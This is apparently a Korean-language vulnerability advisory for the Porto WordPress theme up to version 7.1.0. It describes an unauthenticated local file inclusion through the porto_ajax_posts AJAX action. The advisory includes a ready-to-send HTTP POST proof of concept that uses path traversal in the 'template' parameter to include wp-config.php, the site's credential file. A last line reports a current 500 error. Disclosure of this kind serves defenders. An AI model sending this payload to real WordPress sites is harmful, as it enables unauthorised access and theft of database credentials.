
Porto <= 7.1.0 - 인증되지 않은 로컬 파일 포함 (via porto_ajax_posts)
Porto <= 7.1.0 - 인증되지 않은 로컬 파일 포함 via porto_ajax_posts
WordPress용 Porto 테마는 7.1.0까지의 모든 버전에서 'porto_ajax_posts' 함수를 통해 로컬 파일 포함(Local File Inclusion) 취약점에 영향을 받습니다. 이로 인해 인증되지 않은 공격자가 서버에서 임의의 파일을 포함하고 실행할 수 있게 되어, 해당 파일에 있는 모든 PHP 코드를 실행할 수 있습니다. 이는 접근 제어를 우회하거나, 민감한 데이터를 획득하거나, php 파일 형식을 업로드하고 포함할 수 있는 경우 코드 실행을 달성하는 데 사용될 수 있습니다.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
action=porto_ajax_posts&post_type=post&extra={"shortcode":"porto_posts_grid","template":"../../../../wp-config.php"}
현재 500 오류가 발생 중입니다.